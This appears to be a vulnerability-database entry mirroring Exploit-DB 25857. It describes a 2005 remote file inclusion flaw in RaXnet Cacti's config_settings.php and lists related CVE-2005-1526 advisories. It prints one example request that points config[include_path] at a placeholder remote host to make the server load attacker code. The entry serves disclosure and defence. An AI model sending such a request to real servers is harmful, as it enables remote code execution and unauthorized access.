Lucene search
Maciej Piotr FalkiewiczEDB-ID:25857HistoryJun 20, 2005 - 12:00 a.m.
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion
2005-06-2000:00:00
Maciej Piotr Falkiewicz
www.exploit-db.com
15
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/14028/info
RaXnet Cacti is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'config_settings.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/ Related
ubuntucve
ubuntucve
CVE-2005-1526
2005-06-22 00:00:00
nvd
nvd
CVE-2005-1526
2005-06-22 04:00:00
cvelist
cvelist
CVE-2005-1526
2005-06-22 04:00:00
securityvulns
securityvulns
cve
cve
CVE-2005-1526
2005-06-22 04:00:00
debiancve
debiancve
CVE-2005-1526
2005-06-22 04:00:00
openvas
openvas
Gentoo Security Advisory GLSA 200506-20 (cacti)
2008-09-24 00:00:00
Gentoo Security Advisory GLSA 200506-20 (cacti)
2008-09-24 00:00:00
Debian Security Advisory DSA 764-1 (cacti)
2008-01-17 00:00:00
gentoo
gentoo
Cacti: Several vulnerabilities
2005-06-22 00:00:00
nessus
nessus
GLSA-200506-20 : Cacti: Several vulnerabilities
2005-06-23 00:00:00
Cacti < 0.8.6e Multiple Vulnerabilities
2015-03-03 00:00:00
Cacti Local File Inclusion Vulnerability
2005-06-22 00:00:00
osv
osv
cacti - several
2005-07-21 00:00:00
debian
debian
[SECURITY] [DSA 764-1] New cacti packages fix several vulnerabilities
2005-07-21 05:53:41
[SECURITY] [DSA 764-1] New cacti packages fix several vulnerabilities
2005-07-21 05:53:41